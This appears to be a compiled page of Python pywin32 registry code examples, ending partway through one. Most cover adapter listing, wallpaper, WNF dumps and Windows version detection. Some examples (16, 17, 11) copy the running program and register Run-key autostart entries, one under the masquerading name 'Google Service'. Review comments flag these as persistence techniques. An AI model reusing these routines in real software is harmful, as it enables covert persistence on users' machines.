Esempio n. 1
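def win32_get_adapter_list():
    """Return ``(connection_name, component_id)`` pairs for network adapters.

    Two HKLM trees are joined on the adapter instance GUID: the network
    device class key supplies ``NetCfgInstanceId -> ComponentId`` and the
    network connections key supplies the user-visible connection name.

    Subkeys that cannot be opened or that lack the expected values are
    skipped instead of aborting the whole enumeration, and every registry
    handle is closed before returning.  Failure to open either of the two
    root keys still raises, as before.
    """

    from win32api import RegCloseKey, RegEnumKeyEx, RegOpenKeyEx
    from win32api import RegQueryValueEx
    from win32api import error as win32_error
    from win32con import HKEY_LOCAL_MACHINE

    NET_GUID = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
    CONTROL_PATH = "SYSTEM\\CurrentControlSet\\Control\\"
    ADAPTER_KEY = CONTROL_PATH + "Class\\" + NET_GUID
    NETWORK_CONNECTIONS_KEY = CONTROL_PATH + "Network\\" + NET_GUID

    def subkey_names(path):
        """List the immediate subkey names of an HKLM key."""
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, path)
        try:
            return [entry[0] for entry in RegEnumKeyEx(key)]
        finally:
            RegCloseKey(key)

    def read_values(path, *value_names):
        """Return the named values of an HKLM key, or None if unreadable."""
        try:
            subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, path)
        except win32_error:
            return None
        try:
            return [RegQueryValueEx(subkey, name)[0] for name in value_names]
        except win32_error:
            return None
        finally:
            RegCloseKey(subkey)

    # Pass 1: instance GUID -> driver component id.
    adapter_types = {}
    for child in subkey_names(ADAPTER_KEY):
        values = read_values("\\".join([ADAPTER_KEY, child]),
                             "ComponentId", "NetCfgInstanceId")
        if values is None:
            # Not every child of the class key describes an adapter.
            continue
        component_id, instance_id = values
        adapter_types[instance_id] = component_id

    # Pass 2: attach the connection name to every GUID seen in pass 1.
    adapters = []
    for guid in subkey_names(NETWORK_CONNECTIONS_KEY):
        if not guid.startswith('{') or guid not in adapter_types:
            continue
        values = read_values(
            "\\".join([NETWORK_CONNECTIONS_KEY, guid, "Connection"]), "Name")
        if values is None:
            continue
        adapters.append((values[0], adapter_types[guid]))

    return adapters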
Esempio n. 2
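 def _read_hklm_reg(key_name, value_name):
     """Read one HKLM value from the 32-bit and the 64-bit registry view.

     Returns ``(value32, value64)``.  A view that cannot be read yields
     ``''``.  On 32-bit Windows only the native view exists, so the second
     element is always ``''``.

     Reading both views matters for inventory-style checks: 32-bit software
     on 64-bit Windows stores its settings in the redirected 32-bit view,
     which a 64-bit process would otherwise not see.
     """
     from win32api import RegOpenKeyEx, RegQueryValueEx, RegCloseKey
     from win32con import HKEY_LOCAL_MACHINE, KEY_READ
     KEY_WOW64_64KEY = 0x0100
     KEY_WOW64_32KEY = 0x0200

     def read_view(view_flag):
         """Return the value as seen through one registry view, or ''."""
         try:
             key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0,
                                KEY_READ | view_flag)
         except Exception:
             return ''
         try:
             return RegQueryValueEx(key, value_name)[0]
         except Exception:
             return ''
         finally:
             # Close the handle on the failure path too.
             RegCloseKey(key)

     if _is_64bit_windows():
         return (read_view(KEY_WOW64_32KEY), read_view(KEY_WOW64_64KEY))
     return (read_view(0), '')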
Esempio n. 3
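 def __set_wallpaper_from_bmp(self, bmp_path):
     """Set the current user's desktop wallpaper to the bitmap at *bmp_path*.

     Writes the wallpaper layout values under HKCU ``Control Panel\\Desktop``
     and then asks the shell to apply the new image.
     """
     reg_key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
                            KEY_SET_VALUE)
     try:
         RegSetValueEx(reg_key, "WallpaperStyle", 0, REG_SZ, "2")
         # The value name was misspelled "TillWallpaper", which only created
         # an unused value and left the real tiling setting untouched.
         RegSetValueEx(reg_key, "TileWallpaper", 0, REG_SZ, "0")
     finally:
         # Release the handle even when a write fails.
         reg_key.Close()
     SystemParametersInfo(SPI_SETDESKWALLPAPER, bmp_path,
                          SPIF_SENDWININICHANGE)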
Esempio n. 4
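def DumpKeyInfo(StateName, ShowSd, ShowData):
    """Print the table row for a single WNF state name.

    Args:
        StateName: the state name as a hexadecimal string.
        ShowSd: forwarded to DumpWnfData.
        ShowData: forwarded to DumpWnfData.

    Returns:
        True once the row has been printed, False when the registry lookup
        for a non-temporary state name fails.
    """
    internalName = WNF_STATE_NAME_INTERNAL()
    # The public name is XOR-ed with WNF_STATE_KEY to obtain the internal
    # layout whose bitfields are read below.
    internalName.value = int(StateName, 16) ^ WNF_STATE_KEY
    lifetime = internalName.b.NameLifetime
    value = None

    # Temporary names are not looked up in the registry at all.
    if lifetime != WNF_STATE_NAME_LIFETIME['WnfTemporaryStateName'].value:
        try:
            reghandle = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                     g_LifetimeKeyNames[lifetime], 0, KEY_READ)
        except Exception:
            print("[Error] Could not open root key: {}".format(
                g_LifetimeKeyNames[lifetime]))
            return False

        try:
            value, _ = RegQueryValueEx(reghandle, StateName)
        except error:
            print("[Error] Could not find the WnfName in the registry")
            return False
        finally:
            # Previously the handle leaked when the value lookup failed.
            RegCloseKey(reghandle)

    print(
        "\n| WNF State Name                                                  "
        "| S | L | P | AC | N | CurSize | MaxSize | Changes |")
    print("-" * 118)
    DumpWnfData(int(StateName, 16), value, ShowSd, ShowData)
    return True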
Esempio n. 5
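def DumpWnfNames(ShowSd, ShowData):
    """Print one table per WNF lifetime listing every registered state name.

    Args:
        ShowSd: forwarded to DumpWnfData.
        ShowData: forwarded to DumpWnfData.

    Returns:
        True when every lifetime key was dumped, False as soon as a root
        key cannot be opened or DumpWnfData reports a failure.
    """
    for lifetime in range(len(g_LifetimeKeyNames)):
        try:
            reghandle = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                     g_LifetimeKeyNames[lifetime], 0, KEY_READ)
        except Exception:
            print("[Error] Could not open root key: {}".format(
                g_LifetimeKeyNames[lifetime]))
            return False

        try:
            print(
                "\n| WNF State Name [{:<10} Lifetime]                            "
                "| S | L | P | AC | N | CurSize | MaxSize | Changes |".format(
                    WnfLifetimeStrings[lifetime]))
            print("-" * 118)

            # A separate counter for the value enumeration; the original
            # reused the outer loop variable for it.
            index = 0
            while True:
                try:
                    name, value, _ = RegEnumValue(reghandle, index)
                except error:
                    # RegEnumValue fails once the index runs past the end.
                    break
                index += 1
                try:
                    StateName = int(name, 16)
                except ValueError:
                    # Value names that are not hexadecimal are skipped.
                    continue

                if not DumpWnfData(StateName, value, ShowSd, ShowData):
                    print("[Error] Something went wrong")
                    return False
        finally:
            # Also runs on the early return above, which used to leak the
            # handle.
            RegCloseKey(reghandle)
    return True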
Esempio n. 6
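def run_at_startup_set(appname, path):
    """
    Sets the registry value that runs *path* at startup.

    The value is written under HKEY_LOCAL_MACHINE, so the call needs write
    access to that hive and the entry is machine-wide.  SUBKEY is defined
    elsewhere in the module (presumably the Run key; confirm there).

    NOTE(review): *path* is stored exactly as given.  Callers should pass a
    quoted path to an executable that unprivileged users cannot replace,
    because whatever the value names is launched automatically.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegSetValueEx(key, appname, 0, REG_SZ, path)
    finally:
        # Close the handle even when the write is refused.
        RegCloseKey(key)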
Esempio n. 7
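def run_at_startup_remove(appname):
    """
    Removes the run-at-startup registry value named *appname*.

    The value is deleted from SUBKEY under HKEY_LOCAL_MACHINE (SUBKEY is
    defined elsewhere in the module).  An error from RegDeleteValue, for
    example because the value does not exist, propagates to the caller.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegDeleteValue(key, appname)
    finally:
        # Close the handle even when the delete fails.
        RegCloseKey(key)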
Esempio n. 8
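def try_author():
    """Report whether this process may set values in the HKLM Run key.

    The key is opened with KEY_SET_VALUE and closed again immediately;
    nothing is written.  Returns True when the open succeeds and False on
    any error, which in practice means the process lacks the required
    rights.
    """
    try:
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
        RegCloseKey(key)
    except Exception:
        # Narrowed from a bare except so Ctrl-C and SystemExit still
        # propagate.
        return False
    return True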
Esempio n. 9
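def run_at_startup_set(app_name, path):
    """
    Sets the registry value that runs *path* at startup.

    Writes *path* as a REG_SZ value named *app_name* under SUBKEY in
    HKEY_LOCAL_MACHINE (SUBKEY is defined elsewhere in the module) and
    prints a confirmation.  The write is machine-wide and needs write
    access to that hive.
    """
    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
    try:
        RegSetValueEx(key, app_name, 0, REG_SZ, path)
    finally:
        # Close the handle even when the write is refused.
        RegCloseKey(key)
    print("Key set")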
Esempio n. 10
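def main():
    """Apply ``cache/cache.jpg`` as the current user's desktop wallpaper.

    The layout values are written under HKCU ``Control Panel\\Desktop`` and
    the shell is then told to load the image.  The image path is resolved
    against the current working directory.
    """
    # open the registry key that holds the wallpaper layout settings
    regkey = RegOpenKeyEx(HKEY_CURRENT_USER, 'Control Panel\\Desktop', 0,
                          KEY_SET_VALUE)
    try:
        RegSetValueEx(regkey, 'WallpaperStyle', 0, REG_SZ, '0')
        RegSetValueEx(regkey, 'TileWallpaper', 0, REG_SZ, '0')
    finally:
        # The handle used to stay open for the life of the process.
        regkey.Close()
    # refresh screen
    SystemParametersInfo(SPI_SETDESKWALLPAPER,
                         os.path.abspath('cache/cache.jpg'),
                         SPIF_SENDWININICHANGE)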
Esempio n. 11
def Reg_Edit():
    """Write three hard-coded autostart entries under the HKLM Run key.

    Each entry is a REG_SZ value whose data is a quoted path below
    ``C:/Program Files``.  Values in this key are started at logon, so the
    call changes what runs on the machine for every user.

    NOTE(review): the value named "360sd" launches QQClient.exe, the same
    binary as the "QQClient" entry.  A value name that does not match the
    executable it starts is exactly what autostart audits and registry
    monitoring of the Run key (ATT&CK T1547.001) are meant to surface.
    """
    reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    # KEY_ALL_ACCESS already contains the read and write rights, so the two
    # extra flags are redundant; only value-set access is actually needed.
    reg_falg = win32con.KEY_ALL_ACCESS | win32con.KEY_WRITE | win32con.KEY_READ
    key = RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, reg_path, 0, reg_falg)
    RegSetValueEx(key, "FtpServer", 0, win32con.REG_SZ,
                  "\"C:\\Program Files\\FtpServer.exe\"")
    RegSetValueEx(key, "QQClient", 0, win32con.REG_SZ,
                  "\"C:\\Program Files\\QQClient.exe\"")
    # Same target path as the "QQClient" entry above.
    RegSetValueEx(key, "360sd", 0, win32con.REG_SZ,
                  "\"C:\\Program Files\\QQClient.exe\"")
    RegCloseKey(key)
Esempio n. 12
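def auto_start(what, path):
    """Enable or disable the 'MY_WINDMILL' autostart entry in the HKLM Run key.

    Args:
        what: truthy to register ``"<path>" /start``, falsy to delete the
            entry.
        path: executable path; it is wrapped in double quotes before being
            stored, so paths containing spaces stay unambiguous.

    Returns:
        True on success, False when any registry call fails (for example
        missing rights on HKLM, or deleting an entry that does not exist).
    """
    try:
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
        try:
            if what:
                RegSetValueEx(key, 'MY_WINDMILL', 0, REG_SZ, '"%s" /start' % path)
            else:
                RegDeleteValue(key, 'MY_WINDMILL')
        finally:
            # Previously the handle leaked whenever the set/delete failed.
            RegCloseKey(key)
        return True
    except Exception:
        # Narrowed from a bare except so Ctrl-C and SystemExit propagate.
        return False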
Esempio n. 13
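def set_wall(path=None):
    """Set the current user's desktop wallpaper.

    Args:
        path: image to use; when empty or None the bundled
            ``image/wall.jpg`` next to this module is used.

    Errors are not raised to the caller; they are written to the log via
    dump_log.
    """
    try:
        key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0,
                           KEY_SET_VALUE)
        try:
            RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2')
            RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0')
            if not path:
                path = dirname(__file__) + '/image/wall.jpg'
            # 1 + 2: persist the setting to the user profile and broadcast
            # the change (the SPIF_* flag values).
            SystemParametersInfo(SPI_SETDESKWALLPAPER, path, 1 + 2)
        finally:
            # The handle used to leak when any call above raised.
            RegCloseKey(key)
    except Exception as e:
        # Narrowed from BaseException so Ctrl-C and SystemExit are not
        # swallowed into the log.
        dump_log('设置壁纸' + '--->' + str(e))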
Esempio n. 14
    def __init__(self, key, sub_key, flag):
        """Open a registry key's default value as a file-like buffer.

        Args:
            key: registry root (HKEY_CLASSES_ROOT, HKEY_CURRENT_USER,
                HKEY_LOCAL_MACHINE or HKEY_USERS).
            sub_key: the name of the key that this method opens.
            flag: mode string; "r" for read, "w" for write, "a" for
                append, "b" for binary.

        Raises:
            FileNotFoundError: in read mode, when opening the key or
                reading its default value fails for any reason.
        """
        from win32api import RegQueryValueEx, RegCreateKey, RegOpenKeyEx
        from win32con import KEY_ALL_ACCESS
        from StringIO import StringIO

        # Remember which registry location backs this file object
        self.key = key
        self.sub_key = sub_key

        # Initialization of internal data
        self.deleted = 0
        self.handle = None
        self.data = None

        # Validate the mode string (presumably this also sets self.flag,
        # which is read below; confirm in __checkMode)
        self.__checkMode(flag)

        # Start from an empty in-memory buffer
        self.data = StringIO()

        try:
            # Open registry key
            # NOTE(review): KEY_ALL_ACCESS is requested even in read mode.
            # An account that may only read the key is refused here and the
            # refusal is then reported as "not found" by the handler below.
            self.handle = RegOpenKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)

            # Read the key's default (unnamed) value
            data = RegQueryValueEx(self.handle, "")[0]

            # If the file is in read mode
            if self.flag == self.READ:
                # Expose the stored value through the buffer
                self.data = StringIO(data)
            # If the file is in append mode
            elif self.flag == self.APPEND:
                # Keep the stored value and let later writes follow it
                self.data.write(data)
        # NOTE(review): the bare except treats every failure (access denied,
        # wrong value type, ...) as "key not found"; in the non-read modes
        # that leads straight to RegCreateKey.
        except:  # If the registry key not found
            # If the file must be read
            if self.flag == self.READ:
                # The file is not found
                raise FileNotFoundError(key, sub_key)
            else:
                # Create a new registry key
                self.handle = RegCreateKey(key, sub_key)
Esempio n. 15
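 def StartYardServer(self):
     """Launch the Y.A.R.D. server executable in a new console window.

     The executable path is read from the "program" value under HKCU
     ``Software\\Webers\\Y.A.R.D`` and must exist on disk.

     NOTE(review): that value lives in the per-user hive, so anything
     running as the same user can change what gets started here.
     """
     try:
         rkey = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Webers\\Y.A.R.D")
         path = RegQueryValueEx(rkey, "program")[0]
         if not os.path.exists(path):
             raise Exception
     except Exception:
         raise self.Exception(
             "Please start Yards.exe first and configure it.")
     try:
         # The path is passed as the command line, so it is quoted: an
         # unquoted path containing spaces can be resolved to a different
         # executable (e.g. one named after the part before the first
         # space).  os.path.exists() succeeded above, so the value is a bare
         # path without arguments and quoting it is safe.
         hProcess = CreateProcess(None, '"%s"' % path, None, None, 0,
                                  CREATE_NEW_CONSOLE, None, None,
                                  STARTUPINFO())[0]
     except Exception, exc:
         raise eg.Exception(FormatError(exc[0]))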
def launchAtStart():
    """Install this program into dirProgram and register it to run at startup.

    The work is done only when dirProgram does not exist yet: the directory
    is created, the running script/executable (sys.argv[0]) is copied into
    it, and pathProgram is written as a REG_SZ value named appName under the
    HKLM Run key.  dirProgram, appName and pathProgram are module-level
    names that are not visible in this listing.

    Returns 1 when the installation was performed, 0 when dirProgram
    already existed.

    NOTE(review): copying the running binary elsewhere and then adding a Run
    value for it is the self-install sequence catalogued as ATT&CK
    T1547.001.  Monitoring writes to the Run keys, and Run values that point
    at a recently created executable, catches it.
    """
    #first of all we have to check if the path that we want exists
    if not os.path.exists(dirProgram):
        os.makedirs(dirProgram)
        #copy the program to the new folder
        shutil.copy(sys.argv[0], dirProgram)
        #create the registry key
        # GetModuleFileName and RegDeleteValue are imported but not used in
        # this function.
        from win32api import (GetModuleFileName, RegCloseKey, RegDeleteValue,
                              RegOpenKeyEx, RegSetValueEx)

        from win32con import HKEY_LOCAL_MACHINE, KEY_WRITE, REG_SZ
        SUBKEY = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"

        # HKLM: machine-wide entry; opening it for write needs the
        # corresponding rights on that hive.
        key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE)
        # `flag` is assigned but never read.
        flag = RegSetValueEx(key, appName, 0, REG_SZ, pathProgram)
        RegCloseKey(key)

        return 1

    return 0
Esempio n. 17
    def AutoRun():  # copy the file automatically and make it start at boot
        """Copy the packaged executable to a fixed folder and add a Run value.

        The target is a hard-coded directory in the Administrator profile and
        the value is written to the current user's Run key under the name
        'Google Service'.

        NOTE(review): this is a per-user logon persistence routine (ATT&CK
        T1547.001).  The value name refers to one vendor while the binary
        sits in a folder named after another, a name/path mismatch that
        autostart audits and Run-key registry monitoring are meant to flag.
        """
        alwaysFileName = path.basename(__file__)
        alwaysFileName = alwaysFileName.split('.')[0]
        nowPyPath = path.abspath(path.dirname(__file__))
        nowExeName = path.abspath(
            path.dirname(__file__)) + '\\' + alwaysFileName + '.exe'
        newExeFilePath = 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\' + \
                         alwaysFileName + '.exe'    # after packaging to an exe the name is still .py, so .exe is appended by hand
        if nowPyPath != 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\':  # if the file is not already in the Autodesk location
            try:
                copyfile(nowExeName, newExeFilePath)  # copy the file to the target directory
                print('复制成功')
            except Exception as e:
                print(e)

        KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run'  # registry key name
        keyEnum = RegOpenKeyEx(
            HKEY_CURRENT_USER,
            'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0,
            KEY_ALL_ACCESS)
        ifValueExist = False
        try:  # check whether the value to be written already exists
            i = 0
            # The loop has no exit condition of its own; it ends when
            # RegEnumValue raises, and the bare except below swallows that
            # (and any other) error.
            while True:
                regValue = RegEnumValue(keyEnum, i)
                if regValue[0] == 'Google Service':
                    ifValueExist = True
                    print('键值已存在')
                i += 1
        except:
            pass

        if not ifValueExist:
            try:
                key = RegOpenKey(HKEY_CURRENT_USER, KeyName, 0, KEY_ALL_ACCESS)
                RegSetValueEx(key, 'Google Service', 0, REG_SZ, newExeFilePath)
                RegCloseKey(key)
                print('添加成功!')
            except Exception as e:
                print(e)
Esempio n. 18
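def win32_ver(release='', version='', csd='', ptype=''):
    """ Get additional version information from the Windows Registry
        and return a tuple (release,version,csd,ptype) referring to
        release name, version number, CSD level and OS type
        (multi/single processor).

        The arguments are the defaults handed back for anything that
        cannot be determined.

        As a hint: ptype returns 'Uniprocessor Free' on single
        processor NT machines and 'Multiprocessor Free' on multi
        processor machines. The 'Free' refers to the OS version being
        free of debugging code. It could also state 'Checked' which
        means the OS version uses debugging code, i.e. code that
        checks arguments, ranges, etc. (Thomas Heller).

        Note: this functions only works if Mark Hammond's win32
        package is installed and obviously only runs on Win32
        compatible platforms.

        XXX Is there any way to find out the processor type on WinXX ?

        XXX Is win32 available on Windows CE ?

        Adapted from code posted by Karl Putland to comp.lang.python.

    """
    # Import the needed APIs; without pywin32 the defaults are returned.
    try:
        import win32api
    except ImportError:
        return release, version, csd, ptype
    from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
    from win32con import HKEY_LOCAL_MACHINE,VER_PLATFORM_WIN32_NT,\
                         VER_PLATFORM_WIN32_WINDOWS

    # Find out the registry key and some general version infos
    maj, min, buildno, plat, csd = GetVersionEx()
    version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF)
    if csd[:13] == 'Service Pack ':
        csd = 'SP' + csd[13:]
    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        # Try to guess the release name
        if maj == 4:
            if min == 0:
                release = '95'
            else:
                release = '98'
        elif maj == 5:
            release = '2000'
    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if maj <= 4:
            release = 'NT'
        elif maj == 5:
            release = '2000'
    else:
        if not release:
            # E.g. Win3.1 with win32s
            release = '%i.%i' % (maj, min)
        return release, version, csd, ptype

    # Open the registry key
    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
    except Exception:
        return release, version, csd, ptype

    # From here on the key is closed on every exit path; the original
    # leaked it when the SystemRoot probe or the value parsing failed.
    try:
        try:
            # Get a value to make sure the key exists...
            RegQueryValueEx(keyCurVer, 'SystemRoot')
        except Exception:
            return release, version, csd, ptype

        # Parse values
        build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
        ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]

        # Normalize version
        version = _norm_version(version, build)
    finally:
        RegCloseKey(keyCurVer)
    return release, version, csd, ptype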
Esempio n. 19
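def win32_ver(release='', version='', csd='', ptype=''):
    """ Get additional version information from the Windows Registry
        and return a tuple (release,version,csd,ptype) referring to
        release name, version number, CSD level and OS type
        (multi/single processor).

        The arguments are the defaults handed back for anything that
        cannot be determined.

        As a hint: ptype returns 'Uniprocessor Free' on single
        processor NT machines and 'Multiprocessor Free' on multi
        processor machines. The 'Free' refers to the OS version being
        free of debugging code. It could also state 'Checked' which
        means the OS version uses debugging code, i.e. code that
        checks arguments, ranges, etc. (Thomas Heller).

        Note: this function works best with Mark Hammond's win32
        package installed, but also on Python 2.3 and later. It
        obviously only runs on Win32 compatible platforms.

    """
    # XXX Is there any way to find out the processor type on WinXX ?
    # XXX Is win32 available on Windows CE ?
    #
    # Adapted from code posted by Karl Putland to comp.lang.python.
    #
    # The mappings between reg. values and release names can be found
    # here: http://msdn.microsoft.com/library/en-us/sysinfo/base/osversioninfo_str.asp

    # Plain Win32 constants.  They were only assigned in the emulation
    # branch below, so with pywin32 installed the maj == 6 registry probe
    # referenced unbound locals.
    VER_NT_SERVER = 3
    REG_SZ = 1

    # Import the needed APIs
    try:
        import win32api
        from win32api import RegQueryValueEx, RegOpenKeyEx, \
             RegCloseKey, GetVersionEx
        from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, \
             VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
    except ImportError:
        # Emulate the win32api module using Python APIs
        try:
            sys.getwindowsversion
        except AttributeError:
            # No emulation possible, so return the defaults...
            return release, version, csd, ptype
        else:
            # Emulation using winreg (added in Python 2.0) and
            # sys.getwindowsversion() (added in Python 2.3)
            import winreg
            GetVersionEx = sys.getwindowsversion
            RegQueryValueEx = winreg.QueryValueEx
            RegOpenKeyEx = winreg.OpenKeyEx
            RegCloseKey = winreg.CloseKey
            HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE
            VER_PLATFORM_WIN32_WINDOWS = 1
            VER_PLATFORM_WIN32_NT = 2
            VER_NT_WORKSTATION = 1

    # Find out the registry key and some general version infos
    winver = GetVersionEx()
    maj, min, buildno, plat, csd = winver
    version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF)
    if hasattr(winver, "service_pack"):
        if winver.service_pack != "":
            csd = 'SP%s' % winver.service_pack_major
    else:
        if csd[:13] == 'Service Pack ':
            csd = 'SP' + csd[13:]
    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        # Try to guess the release name
        if maj == 4:
            if min == 0:
                release = '95'
            elif min == 10:
                release = '98'
            elif min == 90:
                release = 'Me'
            else:
                release = 'postMe'
        elif maj == 5:
            release = '2000'
    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if maj <= 4:
            release = 'NT'
        elif maj == 5:
            if min == 0:
                release = '2000'
            elif min == 1:
                release = 'XP'
            elif min == 2:
                release = '2003Server'
            else:
                release = 'post2003'
        elif maj == 6:
            if hasattr(winver, "product_type"):
                product_type = winver.product_type
            else:
                product_type = VER_NT_WORKSTATION
                # Without an OSVERSIONINFOEX capable sys.getwindowsversion(),
                # or help from the registry, we cannot properly identify
                # non-workstation versions.
                try:
                    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                    try:
                        name, value_type = RegQueryValueEx(key, "ProductName")
                    finally:
                        # This probe handle was never closed before.
                        RegCloseKey(key)
                    # Discard any type that isn't REG_SZ
                    if value_type == REG_SZ and name.find("Server") != -1:
                        product_type = VER_NT_SERVER
                except Exception:
                    # Use default of VER_NT_WORKSTATION.  Widened from
                    # WindowsError because pywin32 raises its own error type.
                    pass

            if min == 0:
                if product_type == VER_NT_WORKSTATION:
                    release = 'Vista'
                else:
                    release = '2008Server'
            elif min == 1:
                if product_type == VER_NT_WORKSTATION:
                    release = '7'
                else:
                    release = '2008ServerR2'
            else:
                release = 'post2008Server'
    else:
        if not release:
            # E.g. Win3.1 with win32s
            release = '%i.%i' % (maj, min)
        return release, version, csd, ptype

    # Open the registry key
    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
    except Exception:
        return release, version, csd, ptype

    # The key is closed on every exit path from here on.
    try:
        try:
            # Get a value to make sure the key exists...
            RegQueryValueEx(keyCurVer, 'SystemRoot')
        except Exception:
            return release, version, csd, ptype

        # Parse values
        build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
        ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0]

        # Normalize version
        version = _norm_version(version, build)
    finally:
        RegCloseKey(keyCurVer)
    return release, version, csd, ptype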
Esempio n. 20
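def win32_ver(release='', version='', csd='', ptype=''):
    """ Get additional version information from the Windows Registry
        and return a tuple (release,version,csd,ptype) referring to
        release name, version number, CSD level and OS type
        (multi/single processor).

        The arguments are the defaults handed back for anything that
        cannot be determined.

        As a hint: ptype returns 'Uniprocessor Free' on single
        processor NT machines and 'Multiprocessor Free' on multi
        processor machines. The 'Free' refers to the OS version being
        free of debugging code. It could also state 'Checked' which
        means the OS version uses debugging code, i.e. code that
        checks arguments, ranges, etc. (Thomas Heller).

        Note: this function works best with Mark Hammond's win32
        package installed, but also on Python 2.3 and later. It
        obviously only runs on Win32 compatible platforms.

    """
    # Plain Win32 constants, bound before either API source is chosen.
    # They used to be assigned only in the _winreg fallback, which left
    # them unbound for the maj == 6 registry probe when pywin32 was used.
    VER_NT_SERVER = 3
    REG_SZ = 1

    try:
        import win32api
        from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx
        from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION
    except ImportError:
        # Fall back to the interpreter's own APIs when they exist.
        try:
            sys.getwindowsversion
        except AttributeError:
            return (release, version, csd, ptype)

        import _winreg
        GetVersionEx = sys.getwindowsversion
        RegQueryValueEx = _winreg.QueryValueEx
        RegOpenKeyEx = _winreg.OpenKeyEx
        RegCloseKey = _winreg.CloseKey
        HKEY_LOCAL_MACHINE = _winreg.HKEY_LOCAL_MACHINE
        VER_PLATFORM_WIN32_WINDOWS = 1
        VER_PLATFORM_WIN32_NT = 2
        VER_NT_WORKSTATION = 1

    winver = GetVersionEx()
    maj, min, buildno, plat, csd = winver
    version = '%i.%i.%i' % (maj, min, buildno & 65535)
    if hasattr(winver, 'service_pack'):
        if winver.service_pack != '':
            csd = 'SP%s' % winver.service_pack_major
    elif csd[:13] == 'Service Pack ':
        csd = 'SP' + csd[13:]

    if plat == VER_PLATFORM_WIN32_WINDOWS:
        regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        if maj == 4:
            if min == 0:
                release = '95'
            elif min == 10:
                release = '98'
            elif min == 90:
                release = 'Me'
            else:
                release = 'postMe'
        elif maj == 5:
            release = '2000'
    elif plat == VER_PLATFORM_WIN32_NT:
        regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
        if maj <= 4:
            release = 'NT'
        elif maj == 5:
            if min == 0:
                release = '2000'
            elif min == 1:
                release = 'XP'
            elif min == 2:
                release = '2003Server'
            else:
                release = 'post2003'
        elif maj == 6:
            if hasattr(winver, 'product_type'):
                product_type = winver.product_type
            else:
                # No product type from the version call: guess it from the
                # ProductName value, defaulting to workstation.
                product_type = VER_NT_WORKSTATION
                try:
                    key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
                    try:
                        name, value_type = RegQueryValueEx(key, 'ProductName')
                    finally:
                        # This probe handle was never closed before.
                        RegCloseKey(key)
                    if value_type == REG_SZ and name.find('Server') != -1:
                        product_type = VER_NT_SERVER
                except Exception:
                    # Widened from WindowsError: pywin32 raises its own
                    # error type, which that clause did not catch.
                    pass

            if min == 0:
                if product_type == VER_NT_WORKSTATION:
                    release = 'Vista'
                else:
                    release = '2008Server'
            elif min == 1:
                if product_type == VER_NT_WORKSTATION:
                    release = '7'
                else:
                    release = '2008ServerR2'
            else:
                release = 'post2008Server'
    else:
        if not release:
            release = '%i.%i' % (maj, min)
        return (release, version, csd, ptype)

    try:
        keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey)
    except Exception:
        return (release, version, csd, ptype)

    # The key is closed on every exit path from here on.
    try:
        try:
            # Probe a value to make sure the key is usable.
            RegQueryValueEx(keyCurVer, 'SystemRoot')
        except Exception:
            return (release, version, csd, ptype)

        build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0]
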